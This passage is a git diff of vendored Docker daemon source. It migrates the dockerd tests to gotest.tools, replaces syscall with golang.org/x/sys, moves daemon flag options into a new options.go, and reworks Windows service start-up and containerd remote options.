tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem") - assert.Equal(t, loadedConfig.LogConfig.Type, "syslog") + assert.Assert(t, loadedConfig != nil) + assert.Check(t, is.Equal("/etc/certs/ca.pem", 
loadedConfig.CommonTLSOptions.CAFile)) + assert.Check(t, is.Equal("syslog", loadedConfig.LogConfig.Type)) } func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) { content := `{ + "allow-nondistributable-artifacts": ["allow-nondistributable-artifacts.com"], "registry-mirrors": ["https://mirrors.docker.com"], "insecure-registries": ["https://insecure.docker.com"] }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, len(loadedConfig.Mirrors), 1) - assert.Equal(t, len(loadedConfig.InsecureRegistries), 1) + assert.Check(t, is.Len(loadedConfig.AllowNondistributableArtifacts, 1)) + assert.Check(t, is.Len(loadedConfig.Mirrors, 1)) + assert.Check(t, is.Len(loadedConfig.InsecureRegistries, 1)) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go index bdce98bd26..2561baa774 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go @@ -1,4 +1,4 @@ -// +build !windows,!solaris +// +build !windows package main @@ -9,34 +9,23 @@ import ( "os/signal" "path/filepath" "strconv" - "syscall" + "github.com/containerd/containerd/runtime/linux" "github.com/docker/docker/cmd/dockerd/hack" "github.com/docker/docker/daemon" "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" "github.com/docker/libnetwork/portallocator" + "golang.org/x/sys/unix" ) const defaultDaemonConfigFile = "/etc/docker/daemon.json" -// currentUserIsOwner checks whether the current user is the owner of the given -// file. 
-func currentUserIsOwner(f string) bool { - if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { - if int(fileInfo.UID()) == os.Getuid() { - return true - } - } - return false -} - // setDefaultUmask sets the umask to 0022 to avoid problems // caused by custom umask func setDefaultUmask() error { desiredUmask := 0022 - syscall.Umask(desiredUmask) - if umask := syscall.Umask(desiredUmask); umask != desiredUmask { + unix.Umask(desiredUmask) + if umask := unix.Umask(desiredUmask); umask != desiredUmask { return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) } @@ -47,42 +36,37 @@ func getDaemonConfDir(_ string) string { return "/etc/docker" } -// setupConfigReloadTrap configures the USR2 signal to reload the configuration. -func (cli *DaemonCli) setupConfigReloadTrap() { - c := make(chan os.Signal, 1) - signal.Notify(c, syscall.SIGHUP) - go func() { - for range c { - cli.reloadConfig() - } - }() -} - -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { +func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) { opts := []libcontainerd.RemoteOption{ - libcontainerd.WithDebugLog(cli.Config.Debug), libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust), + libcontainerd.WithPlugin("linux", &linux.Config{ + Shim: daemon.DefaultShimBinary, + Runtime: daemon.DefaultRuntimeBinary, + RuntimeRoot: filepath.Join(cli.Config.Root, "runc"), + ShimDebug: cli.Config.Debug, + }), + } + if cli.Config.Debug { + opts = append(opts, libcontainerd.WithLogLevel("debug")) } if cli.Config.ContainerdAddr != "" { opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) } else { opts = append(opts, libcontainerd.WithStartDaemon(true)) } - if daemon.UsingSystemd(cli.Config) { - args := []string{"--systemd-cgroup=true"} - opts = append(opts, libcontainerd.WithRuntimeArgs(args)) - } - if cli.Config.LiveRestoreEnabled { - opts = append(opts, libcontainerd.WithLiveRestore(true)) - 
} - opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary)) - return opts + + return opts, nil } -// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to -// store their state. -func (cli *DaemonCli) getLibcontainerdRoot() string { - return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + c := make(chan os.Signal, 1) + signal.Notify(c, unix.SIGHUP) + go func() { + for range c { + cli.reloadConfig() + } + }() } // getSwarmRunRoot gets the root directory for swarm to store runtime state @@ -120,17 +104,13 @@ func allocateDaemonPort(addr string) error { return nil } -// notifyShutdown is called after the daemon shuts down but before the process exits. -func notifyShutdown(err error) { -} - func wrapListeners(proto string, ls []net.Listener) []net.Listener { switch proto { case "unix": - ls[0] = &hack.MalformedHostHeaderOverride{ls[0]} + ls[0] = &hack.MalformedHostHeaderOverride{Listener: ls[0]} case "fd": for i := range ls { - ls[i] = &hack.MalformedHostHeaderOverride{ls[i]} + ls[i] = &hack.MalformedHostHeaderOverride{Listener: ls[i]} } } return ls diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go index d66dba77e1..692d0328c4 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go @@ -1,50 +1,49 @@ -// +build !windows,!solaris - -// TODO: Create new file for Solaris which tests config parameters -// as described in daemon/config_solaris.go +// +build !windows package main import ( - "github.com/docker/docker/daemon" - "github.com/docker/docker/pkg/testutil/assert" - "github.com/docker/docker/pkg/testutil/tempfile" "testing" + + "github.com/docker/docker/daemon/config" + "gotest.tools/assert" + is 
"gotest.tools/assert/cmp" + "gotest.tools/fs" ) func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) { content := `{"log-opts": {"max-size": "1k"}}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) - opts.common.Debug = true - opts.common.LogLevel = "info" - assert.NilError(t, opts.flags.Set("selinux-enabled", "true")) + opts := defaultOptions(tempFile.Path()) + opts.Debug = true + opts.LogLevel = "info" + assert.Check(t, opts.flags.Set("selinux-enabled", "true")) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.Debug, true) - assert.Equal(t, loadedConfig.LogLevel, "info") - assert.Equal(t, loadedConfig.EnableSelinuxSupport, true) - assert.Equal(t, loadedConfig.LogConfig.Type, "json-file") - assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k") + assert.Check(t, loadedConfig.Debug) + assert.Check(t, is.Equal("info", loadedConfig.LogLevel)) + assert.Check(t, loadedConfig.EnableSelinuxSupport) + assert.Check(t, is.Equal("json-file", loadedConfig.LogConfig.Type)) + assert.Check(t, is.Equal("1k", loadedConfig.LogConfig.Config["max-size"])) } func TestLoadDaemonConfigWithNetwork(t *testing.T) { content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.IP, "127.0.0.2") - assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1") + assert.Check(t, is.Equal("127.0.0.2", loadedConfig.IP)) + assert.Check(t, 
is.Equal("127.0.0.1", loadedConfig.DefaultIP.String())) } func TestLoadDaemonConfigWithMapOptions(t *testing.T) { @@ -52,63 +51,49 @@ func TestLoadDaemonConfigWithMapOptions(t *testing.T) { "cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"}, "log-opts": {"tag": "test"} }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) + assert.Assert(t, loadedConfig != nil) + assert.Check(t, loadedConfig.ClusterOpts != nil) expectedPath := "/var/lib/docker/discovery_certs/ca.pem" - assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath) - assert.NotNil(t, loadedConfig.LogConfig.Config) - assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test") + assert.Check(t, is.Equal(expectedPath, loadedConfig.ClusterOpts["kv.cacertfile"])) + assert.Check(t, loadedConfig.LogConfig.Config != nil) + assert.Check(t, is.Equal("test", loadedConfig.LogConfig.Config["tag"])) } func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) { content := `{ "userland-proxy": false }` - tempFile := tempfile.NewTempFile(t, "config", content) + tempFile := fs.NewFile(t, "config", fs.WithContent(content)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) + assert.Assert(t, loadedConfig != nil) - assert.Equal(t, loadedConfig.EnableUserlandProxy, false) + assert.Check(t, !loadedConfig.EnableUserlandProxy) // make sure reloading doesn't generate configuration // conflicts after normalizing boolean values. 
- reload := func(reloadedConfig *daemon.Config) { - assert.Equal(t, reloadedConfig.EnableUserlandProxy, false) + reload := func(reloadedConfig *config.Config) { + assert.Check(t, !reloadedConfig.EnableUserlandProxy) } - assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload)) + assert.Check(t, config.Reload(opts.configFile, opts.flags, reload)) } func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) { - tempFile := tempfile.NewTempFile(t, "config", `{}`) + tempFile := fs.NewFile(t, "config", fs.WithContent(`{}`)) defer tempFile.Remove() - opts := defaultOptions(tempFile.Name()) + opts := defaultOptions(tempFile.Path()) loadedConfig, err := loadDaemonCliConfig(opts) assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.NotNil(t, loadedConfig.ClusterOpts) - - assert.Equal(t, loadedConfig.EnableUserlandProxy, true) -} + assert.Assert(t, loadedConfig != nil) -func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) { - content := `{"disable-legacy-registry": true}` - tempFile := tempfile.NewTempFile(t, "config", content) - defer tempFile.Remove() - - opts := defaultOptions(tempFile.Name()) - loadedConfig, err := loadDaemonCliConfig(opts) - assert.NilError(t, err) - assert.NotNil(t, loadedConfig) - assert.Equal(t, loadedConfig.V2Only, true) + assert.Check(t, loadedConfig.EnableUserlandProxy) } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go index 4cccd32688..224c509455 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go @@ -5,21 +5,14 @@ import ( "net" "os" "path/filepath" - "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/libcontainerd" - "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" + "golang.org/x/sys/windows" ) var defaultDaemonConfigFile = "" -// currentUserIsOwner checks whether 
the current user is the owner of the given -// file. -func currentUserIsOwner(f string) bool { - return false -} - // setDefaultUmask doesn't do anything on windows func setDefaultUmask() error { return nil @@ -29,8 +22,10 @@ func getDaemonConfDir(root string) string { return filepath.Join(root, `\config`) } -// notifySystem sends a message to the host when the server is ready to be used -func notifySystem() { +// preNotifySystem sends a message to the host when the API is active, but before the daemon is +func preNotifySystem() { + // start the service now to prevent timeouts waiting for daemon to start + // but still (eventually) complete all requests that are sent after this if service != nil { err := service.started() if err != nil { @@ -39,6 +34,10 @@ func notifySystem() { } } +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { +} + // notifyShutdown is called after the daemon shuts down but before the process exits. func notifyShutdown(err error) { if service != nil { @@ -49,34 +48,28 @@ func notifyShutdown(err error) { } } +func (cli *DaemonCli) getPlatformRemoteOptions() ([]libcontainerd.RemoteOption, error) { + return nil, nil +} + // setupConfigReloadTrap configures a Win32 event to reload the configuration. 
func (cli *DaemonCli) setupConfigReloadTrap() { go func() { - sa := syscall.SecurityAttributes{ + sa := windows.SecurityAttributes{ Length: 0, } - ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) - if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 { - logrus.Debugf("Config reload - waiting signal at %s", ev) + event := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) + ev, _ := windows.UTF16PtrFromString(event) + if h, _ := windows.CreateEvent(&sa, 0, 0, ev); h != 0 { + logrus.Debugf("Config reload - waiting signal at %s", event) for { - syscall.WaitForSingleObject(h, syscall.INFINITE) + windows.WaitForSingleObject(h, windows.INFINITE) cli.reloadConfig() } } }() } -func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { - return nil -} - -// getLibcontainerdRoot gets the root directory for libcontainerd to store its -// state. The Windows libcontainerd implementation does not need to write a spec -// or state to disk, so this is a no-op. 
-func (cli *DaemonCli) getLibcontainerdRoot() string { - return "" -} - // getSwarmRunRoot gets the root directory for swarm to store runtime state // For example, the control socket func (cli *DaemonCli) getSwarmRunRoot() string { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go index 60742ae927..463482e938 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/docker.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go @@ -3,33 +3,19 @@ package main import ( "fmt" "os" - "path/filepath" "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/docker/cli" - cliflags "github.com/docker/docker/cli/flags" - "github.com/docker/docker/daemon" + "github.com/docker/docker/daemon/config" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/term" + "github.com/sirupsen/logrus" "github.com/spf13/cobra" - "github.com/spf13/pflag" ) -type daemonOptions struct { - version bool - configFile string - daemonConfig *daemon.Config - common *cliflags.CommonOptions - flags *pflag.FlagSet -} - func newDaemonCommand() *cobra.Command { - opts := daemonOptions{ - daemonConfig: daemon.NewConfig(), - common: cliflags.NewCommonOptions(), - } + opts := newDaemonOptions(config.New()) cmd := &cobra.Command{ Use: "dockerd [OPTIONS]", @@ -41,57 +27,21 @@ func newDaemonCommand() *cobra.Command { opts.flags = cmd.Flags() return runDaemon(opts) }, + DisableFlagsInUseLine: true, + Version: fmt.Sprintf("%s, build %s", dockerversion.Version, dockerversion.GitCommit), } cli.SetupRootCommand(cmd) flags := cmd.Flags() - flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit") - flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file") - opts.common.InstallFlags(flags) - opts.daemonConfig.InstallFlags(flags) + flags.BoolP("version", "v", false, "Print version information and 
quit") + flags.StringVar(&opts.configFile, "config-file", defaultDaemonConfigFile, "Daemon configuration file") + opts.InstallFlags(flags) + installConfigFlags(opts.daemonConfig, flags) installServiceFlags(flags) return cmd } -func runDaemon(opts daemonOptions) error { - if opts.version { - showVersion() - return nil - } - - daemonCli := NewDaemonCli() - - // Windows specific settings as these are not defaulted. - if runtime.GOOS == "windows" { - if opts.daemonConfig.Pidfile == "" { - opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") - } - if opts.configFile == "" { - opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) - } - } - - // On Windows, this may be launching as a service or with an option to - // register the service. - stop, err := initService(daemonCli) - if err != nil { - logrus.Fatal(err) - } - - if stop { - return nil - } - - err = daemonCli.start(opts) - notifyShutdown(err) - return err -} - -func showVersion() { - fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) -} - func main() { if reexec.Init() { return @@ -99,7 +49,14 @@ func main() { // Set terminal emulation based on platform as required. _, stdout, stderr := term.StdStreams() - logrus.SetOutput(stderr) + + // @jhowardmsft - maybe there is a historic reason why on non-Windows, stderr is used + // here. However, on Windows it makes no sense and there is no need. 
+ if runtime.GOOS == "windows" { + logrus.SetOutput(stdout) + } else { + logrus.SetOutput(stderr) + } cmd := newDaemonCommand() cmd.SetOutput(stdout) diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go new file mode 100644 index 0000000000..0dec48663d --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package main + +func runDaemon(opts *daemonOptions) error { + daemonCli := NewDaemonCli() + return daemonCli.start(opts) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go index 19c5587cb6..bd8bc5a58e 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go @@ -1,18 +1,38 @@ package main import ( - "sync/atomic" + "path/filepath" _ "github.com/docker/docker/autogen/winresources/dockerd" + "github.com/sirupsen/logrus" ) -//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" +func runDaemon(opts *daemonOptions) error { + daemonCli := NewDaemonCli() -var dummy uintptr + // On Windows, this may be launching as a service or with an option to + // register the service. + stop, runAsService, err := initService(daemonCli) + if err != nil { + logrus.Fatal(err) + } -func init() { - // Ensure that this import is not removed by the linker. This is used to - // ensure that shell32.dll is loaded by the system loader, preventing - // go#15286 from triggering on Nano Server TP5. - atomic.LoadUintptr(&dummy) + if stop { + return nil + } + + // Windows specific settings as these are not defaulted. 
+ if opts.configFile == "" { + opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) + } + if runAsService { + // If Windows SCM manages the service - no need for PID files + opts.daemonConfig.Pidfile = "" + } else if opts.daemonConfig.Pidfile == "" { + opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") + } + + err = daemonCli.start(opts) + notifyShutdown(err) + return err } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go index d4aa3ddd73..ddd5eb9d8b 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go @@ -1,6 +1,6 @@ // +build !windows -package hack +package hack // import "github.com/docker/docker/cmd/dockerd/hack" import "net" @@ -111,7 +111,7 @@ func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) { } // Accept makes the listener accepts connections and wraps the connection -// in a MalformedHostHeaderOverrideConn initilizing first to true. +// in a MalformedHostHeaderOverrideConn initializing first to true. 
func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) { c, err := l.Listener.Accept() if err != nil { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go index 1a0a60baf3..6874b059be 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go @@ -1,6 +1,6 @@ // +build !windows -package hack +package hack // import "github.com/docker/docker/cmd/dockerd/hack" import ( "bytes" diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go index 0c8860408b..20ceaf8466 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go @@ -4,8 +4,8 @@ import ( "net" "net/http" - "github.com/Sirupsen/logrus" - metrics "github.com/docker/go-metrics" + "github.com/docker/go-metrics" + "github.com/sirupsen/logrus" ) func startMetricsServer(addr string) error { diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cmd/dockerd/options.go similarity index 56% rename from vendor/github.com/docker/docker/cli/flags/common.go rename to vendor/github.com/docker/docker/cmd/dockerd/options.go index e2f9da0732..a6276add59 100644 --- a/vendor/github.com/docker/docker/cli/flags/common.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/options.go @@ -1,27 +1,26 @@ -package flags +package main import ( "fmt" "os" "path/filepath" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/cliconfig" + cliconfig "github.com/docker/docker/cli/config" + "github.com/docker/docker/daemon/config" "github.com/docker/docker/opts" "github.com/docker/go-connections/tlsconfig" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) const ( - // DefaultTrustKeyFile is the default 
filename for the trust key - DefaultTrustKeyFile = "key.json" // DefaultCaFile is the default filename for the CA pem file DefaultCaFile = "ca.pem" // DefaultKeyFile is the default filename for the key pem file DefaultKeyFile = "key.pem" // DefaultCertFile is the default filename for the cert pem file DefaultCertFile = "cert.pem" - // FlagTLSVerify is the flag name for the tls verification option + // FlagTLSVerify is the flag name for the TLS verification option FlagTLSVerify = "tlsverify" ) @@ -30,65 +29,68 @@ var ( dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != "" ) -// CommonOptions are options common to both the client and the daemon. -type CommonOptions struct { - Debug bool - Hosts []string - LogLevel string - TLS bool - TLSVerify bool - TLSOptions *tlsconfig.Options - TrustKey string +type daemonOptions struct { + configFile string + daemonConfig *config.Config + flags *pflag.FlagSet + Debug bool + Hosts []string + LogLevel string + TLS bool + TLSVerify bool + TLSOptions *tlsconfig.Options } -// NewCommonOptions returns a new CommonOptions -func NewCommonOptions() *CommonOptions { - return &CommonOptions{} +// newDaemonOptions returns a new daemonFlags +func newDaemonOptions(config *config.Config) *daemonOptions { + return &daemonOptions{ + daemonConfig: config, + } } // InstallFlags adds flags for the common options on the FlagSet -func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) { +func (o *daemonOptions) InstallFlags(flags *pflag.FlagSet) { if dockerCertPath == "" { - dockerCertPath = cliconfig.ConfigDir() + dockerCertPath = cliconfig.Dir() } - flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode") - flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")") - flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify") - flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and 
verify the remote") + flags.BoolVarP(&o.Debug, "debug", "D", false, "Enable debug mode") + flags.StringVarP(&o.LogLevel, "log-level", "l", "info", `Set the logging level ("debug"|"info"|"warn"|"error"|"fatal")`) + flags.BoolVar(&o.TLS, "tls", false, "Use TLS; implied by --tlsverify") + flags.BoolVar(&o.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote") // TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file") - commonOpts.TLSOptions = &tlsconfig.Options{ + o.TLSOptions = &tlsconfig.Options{ CAFile: filepath.Join(dockerCertPath, DefaultCaFile), CertFile: filepath.Join(dockerCertPath, DefaultCertFile), KeyFile: filepath.Join(dockerCertPath, DefaultKeyFile), } - tlsOptions := commonOpts.TLSOptions + tlsOptions := o.TLSOptions flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA") flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file") flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file") - hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost) + hostOpt := opts.NewNamedListOptsRef("hosts", &o.Hosts, opts.ValidateHost) flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to") } // SetDefaultOptions sets default values for options after flag parsing is // complete -func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { +func (o *daemonOptions) SetDefaultOptions(flags *pflag.FlagSet) { // Regardless of whether the user sets it to true or false, if they - // specify --tlsverify at all then we need to turn on tls + // specify --tlsverify at all then we need to turn on TLS // TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need // to check that here as well - if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify { - commonOpts.TLS = true + if flags.Changed(FlagTLSVerify) || o.TLSVerify { + o.TLS = true } - if 
!commonOpts.TLS { - commonOpts.TLSOptions = nil + if !o.TLS { + o.TLSOptions = nil } else { - tlsOptions := commonOpts.TLSOptions - tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify + tlsOptions := o.TLSOptions + tlsOptions.InsecureSkipVerify = !o.TLSVerify // Reset CertFile and KeyFile to empty string if the user did not specify // the respective flags and the respective default files were not found. @@ -105,8 +107,8 @@ func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) { } } -// SetLogLevel sets the logrus logging level -func SetLogLevel(logLevel string) { +// setLogLevel sets the logrus logging level +func setLogLevel(logLevel string) { if logLevel != "" { lvl, err := logrus.ParseLevel(logLevel) if err != nil { diff --git a/vendor/github.com/docker/docker/cmd/dockerd/options_test.go b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go new file mode 100644 index 0000000000..691118f08f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/options_test.go @@ -0,0 +1,44 @@ +package main + +import ( + "path/filepath" + "testing" + + cliconfig "github.com/docker/docker/cli/config" + "github.com/docker/docker/daemon/config" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCommonOptionsInstallFlags(t *testing.T) { + flags := pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := newDaemonOptions(&config.Config{}) + opts.InstallFlags(flags) + + err := flags.Parse([]string{ + "--tlscacert=\"/foo/cafile\"", + "--tlscert=\"/foo/cert\"", + "--tlskey=\"/foo/key\"", + }) + assert.Check(t, err) + assert.Check(t, is.Equal("/foo/cafile", opts.TLSOptions.CAFile)) + assert.Check(t, is.Equal("/foo/cert", opts.TLSOptions.CertFile)) + assert.Check(t, is.Equal(opts.TLSOptions.KeyFile, "/foo/key")) +} + +func defaultPath(filename string) string { + return filepath.Join(cliconfig.Dir(), filename) +} + +func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) { + flags := 
pflag.NewFlagSet("testing", pflag.ContinueOnError) + opts := newDaemonOptions(&config.Config{}) + opts.InstallFlags(flags) + + err := flags.Parse([]string{}) + assert.Check(t, err) + assert.Check(t, is.Equal(defaultPath("ca.pem"), opts.TLSOptions.CAFile)) + assert.Check(t, is.Equal(defaultPath("cert.pem"), opts.TLSOptions.CertFile)) + assert.Check(t, is.Equal(defaultPath("key.pem"), opts.TLSOptions.KeyFile)) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go index 64ad7fcaa0..bbcb7f3f3b 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go @@ -6,9 +6,5 @@ import ( "github.com/spf13/pflag" ) -func initService(daemonCli *DaemonCli) (bool, error) { - return false, nil -} - func installServiceFlags(flags *pflag.FlagSet) { } diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go index dd37abcf3c..00432af643 100644 --- a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go @@ -5,15 +5,15 @@ import ( "errors" "fmt" "io/ioutil" + "log" "os" "os/exec" "path/filepath" - "syscall" "time" "unsafe" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" "golang.org/x/sys/windows" "golang.org/x/sys/windows/svc" @@ -29,7 +29,7 @@ var ( flRunService *bool setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle") - oldStderr syscall.Handle + oldStderr windows.Handle panicFile *os.File service *handler @@ -130,14 +130,14 @@ func (h *etwHook) Fire(e *logrus.Entry) error { err error ) - ss[0], err = syscall.UTF16PtrFromString(e.Message) + ss[0], err = windows.UTF16PtrFromString(e.Message) if err != nil { return err } count := uint16(1) 
